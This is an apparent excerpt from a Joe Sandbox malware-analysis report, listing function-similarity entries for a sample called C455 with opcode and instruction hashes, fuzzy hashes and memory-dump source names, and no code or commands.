                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,)*k
                                                                                                                                                                                                                                                                • API String ID: 0-1228391949
                                                                                                                                                                                                                                                                • Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                                • Instruction ID: 4aa44f4d7582517ea1750c016250647a61269be66e61a1d13236183b5a6c405e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0C14375A0C3309BD724DF68E880A2FBBE2AFD6704F199A3CE58563691D631DD04C792
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: ,)*k
                                                                                                                                                                                                                                                                • API String ID: 2994545307-1228391949
                                                                                                                                                                                                                                                                • Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                                • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: m
                                                                                                                                                                                                                                                                • API String ID: 0-3775001192
                                                                                                                                                                                                                                                                • Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                                • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                                                                                • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                • Instruction ID: 5aae080a30551e1c963a09e3ebbbb9b8416ffe31786698fd5c4bdd766e7cb9f9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76C12AB5D00615CBCB24CF29C8516BBB7B1FF95320F19825DD895AB7D0E734A941CB90
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 167H
                                                                                                                                                                                                                                                                • API String ID: 0-2704650348
                                                                                                                                                                                                                                                                • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                • Instruction ID: 9eb75ad3ef580723caf202627c15b144cc87d473a2b1aa1d86005144195fd369
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0ED14672E087548BD718CF3888816EBB7A2EFD5314F19862CE9958B3C1D735DE468782
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: 167H
                                                                                                                                                                                                                                                                • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                                • Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                                                                                • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &#
                                                                                                                                                                                                                                                                • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                • Instruction ID: 3140aba5d0f16ecf6d7d1ff80d4cab5542a6873f4b369ac247bbfaa6f2cd5e28
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CA126B26042105BDB18DB28CC927FBB3E5EF91320F09862CE9969B291E734DD55C352
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: &#
                                                                                                                                                                                                                                                                • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                                                                                • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: de
                                                                                                                                                                                                                                                                • API String ID: 0-2106599819
                                                                                                                                                                                                                                                                • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                • Instruction ID: 4231034f7488f9145023b98638c85787ace5b4389f6127544f1a24d33bfd7a70
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F9141719083048AC324DF28D89266BB7F2EFD5324F189A2CE4D64B3D1F7799909C792
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ~
                                                                                                                                                                                                                                                                • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                • Opcode ID: 8c5aa6b5a5b2fe2e388992ca06d89cc462c2ef20750d480a456fbd2899bcd495
                                                                                                                                                                                                                                                                • Instruction ID: f0f9d7d1a4bb850abf4acc4207b43e07f3481d83b29eef96e1c510273cfc63fe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c5aa6b5a5b2fe2e388992ca06d89cc462c2ef20750d480a456fbd2899bcd495
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1A15873A082655FC725CF68DC8066AB7E1AFC5320F19823DECA9973D1D6319C0697C1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ~
                                                                                                                                                                                                                                                                • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                • Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: RpB
                                                                                                                                                                                                                                                                • API String ID: 0-664042118
                                                                                                                                                                                                                                                                • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: d1
                                                                                                                                                                                                                                                                • API String ID: 0-4211392460
                                                                                                                                                                                                                                                                • Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                                • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: c$
                                                                                                                                                                                                                                                                • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                • Instruction ID: 8a579689cc7cbd88947a31dc360dd109a5637dad473e793d7946f42db69ceed4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 299199B0504741CFD7648F25C4A4B67BBB2FF46318F19968CC4864FBA1E379A886CB94
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ihgf
                                                                                                                                                                                                                                                                • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                • Instruction ID: 83f0e37475f4082106277fde8a09e197ef2d32f07c0621cbf094f4f86049ba45
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E81AE746082119FD714DF2CD981A6BB7E2EF99314F19863CE5848B3A2EB31EC41CB42
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: ihgf
                                                                                                                                                                                                                                                                • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                • Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                                • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                                • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                • Instruction ID: f20b419b06bf251561463c60a5159db1825a41bb07e594826cdf2ca1f469a4c9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C710432B093558BD714CF29C98039EBBE2ABE5710F29856DE4A89B391D334DD858B43
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                                • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: w
                                                                                                                                                                                                                                                                • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                • Instruction ID: c2529830d13faa66df5ae24007ac22e8da4efcd1d695ba3ef24e8f9dea464536
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B24105B6E116618FD704DFA4CD855ABBB72FF84315B0AC1A8C8847B31AD77869078BD0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: w
                                                                                                                                                                                                                                                                • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ihgf
                                                                                                                                                                                                                                                                • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                • Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                • Instruction ID: 3ff8925c19186f9b8339f0c6933488be9d209fb474ab718f00e89b93f4c7eb21
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1131E434308310ABE7209F2CEC91B3FB7A5EB96B14F24493CE586972A2D661EC51C656
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ihgf
